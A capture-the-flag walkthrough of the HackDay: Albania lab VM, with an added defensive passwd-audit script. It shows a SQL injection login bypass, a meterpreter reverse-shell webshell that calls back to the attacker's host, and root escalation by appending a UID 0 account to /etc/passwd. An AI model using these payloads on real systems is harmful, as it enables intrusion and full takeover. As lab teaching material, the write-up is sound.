HackDay: Albania
References
- https://www.vulnhub.com/entry/hackday-albania,167/
- http://www.hackingarticles.in/hack-hackday-albania-vm-ctf-challenge/
- https://hackinguyz.blogspot.tw/2016/12/ctf-hackday-albania-walkthrough.html
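Key takeaways
- Use Python to crawl a large number of URLs and check whether any of them returns different content; remember to strip the newline
- Look for writable files
- Create your own Linux account with root privileges and write it to /etc/passwd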
Writeup
- web: http://192.168.1.103:8008
robots.txt: 192.168.1.103:8008/robots.txt, a bunch of suspicious links
...
Disallow: /atoydiajqwpejc/
Disallow: /bupzejbkrxqfkd/
Disallow: /cvqafkclsyrgle/
Disallow: /unisxcudkqjydw/
Disallow: /dwrbgldmtzshmf/
Disallow: /exschmenuating/
Disallow: /fytdinfovbujoh/
Disallow: /gzuejogpwcvkpi/
...
Write a Python script to crawl them
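import requests

# urllist.txt holds one path from robots.txt per line
with open('urllist.txt') as f:
    for line in f:
        path = line.rstrip()  # strip the trailing newline
        r = requests.head("http://192.168.1.103:8008" + path)
        # print each path with the size the server reports for it
        print(path + "=" + r.headers.get('content-length', '?'))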
The result shows that the /unisxcudkqjydw/ page has a different size from the others
/cvqafkclsyrgle/=150
/unisxcudkqjydw/=37
/dwrbgldmtzshmf/=150
IS there any /vulnbank/ in there ???
Found the login page: http://192.168.1.103:8008/unisxcudkqjydw/vulnbank/client/login.php
Inserting a single quote triggers an error message
Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, boolean given in /var/www/html/unisxcudkqjydw/vulnbank/client/config.php on line 102
Login bypass payload:
' or 'a' = 'a' #
There is an upload page; upload a webshell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.102 lport=4444 -f raw
- Copy the generated payload from <?php to the end, and append ?> at the end
- Rename it to webshell.jpg
Start Metasploit and run the handler
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.102
lhost => 192.168.1.102
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > run
[*] Started reverse TCP handler on 192.168.1.102:4444
[*] Starting the payload handler...
Open http://192.168.1.103:8008/unisxcudkqjydw/vulnbank/client/view_ticket.php?id=1
- Get a shell and spawn a tty:
meterpreter > shell
Process 6865 created.
Channel 0 created.
python3 -c 'import pty; pty.spawn("/bin/bash");'
www-data@hackday:/var/www/html/unisxcudkqjydw/vulnbank/client$
Look for writable files:
find / -writable -type f 2>/dev/null
- /etc/passwd turns out to be writable
-rw-r--rw- 1 root root 2026 Dec 10 07:04 /etc/passwd
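Create an account of your own and append it to /etc/passwd
Generate the password hash with openssl passwd -1, setting the password to kali
root@kali:~# openssl passwd -1
Password:
Verifying - Password:
$1$f/YvLJt0$PCa0AWxixTBMcKWY1xn0v0
openssl passwd -1 uses MD5; to use SHA-256 instead, generate the hash with Python:
python3 -c "import crypt; print(crypt.crypt('KALI', crypt.mksalt(crypt.METHOD_SHA256)))"
New account kali (root privileges: UID and GID set to 0):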
kali:$1$f/YvLJt0$PCa0AWxixTBMcKWY1xn0v0:0:0:test:/root:/bin/bash
Append it to /etc/passwd:
echo 'kali:$1$f/YvLJt0$PCa0AWxixTBMcKWY1xn0v0:0:0:test:/root:/bin/bash' >> /etc/passwd
Switch to user kali to get root privileges
www-data@hackday:/var/www/html/unisxcudkqjydw/vulnbank/client$ su kali
su kali
Password: kali
root@hackday:/var/www/html/unisxcudkqjydw/vulnbank/client# id
id
uid=0(root) gid=0(root) groups=0(root)
Get the flag
root@hackday:~# ls
ls
flag.txt
root@hackday:~# cat flag.txt
cat flag.txt
Urime, Tani nis raportin! d5ed38fdbf28bc4e58be142cf5a17cf5
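Added example, not part of the original writeup: a defender-side audit for the condition the privilege escalation above relied on (a passwd file writable by non-root users, an extra UID 0 account, and a password hash stored directly in the passwd field). The function name `audit_passwd` and the finding labels are assumptions of this example; the sample data is constructed from the line shown in the writeup.

```python
import os
import stat
import sys

# Constructed sample: two ordinary entries plus the line appended in this writeup.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
    "kali:$1$f/YvLJt0$PCa0AWxixTBMcKWY1xn0v0:0:0:test:/root:/bin/bash\n"
)


def audit_passwd(path="/etc/passwd"):
    """Return (kind, detail) findings for the passwd-format file at `path`."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    # Expected mode is 0644; group/other write lets non-root users add accounts.
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(("writable", f"mode {mode:04o}"))
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            line = line.rstrip("\n")
            if not line or line.startswith("#"):
                continue
            fields = line.split(":")
            if len(fields) != 7:
                findings.append(("malformed", f"line {lineno}"))
                continue
            name, pw, uid = fields[0], fields[1], fields[2]
            # Any UID 0 account other than root is a second superuser.
            if uid.isdigit() and int(uid) == 0 and name != "root":
                findings.append(("uid0", name))
            # With shadow passwords this field is 'x'; a modular-crypt hash
            # ($id$...) here is honoured at login and bypasses /etc/shadow.
            if pw.startswith("$"):
                findings.append(("hash-in-passwd", name))
            elif pw == "":
                findings.append(("empty-password", name))
    return findings


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "/etc/passwd"
    for kind, detail in audit_passwd(target):
        print(f"{kind}: {detail}")
```

Run on the mode and contents shown in the writeup, it reports the writable file, the `kali` UID 0 account and the hash stored in its passwd field.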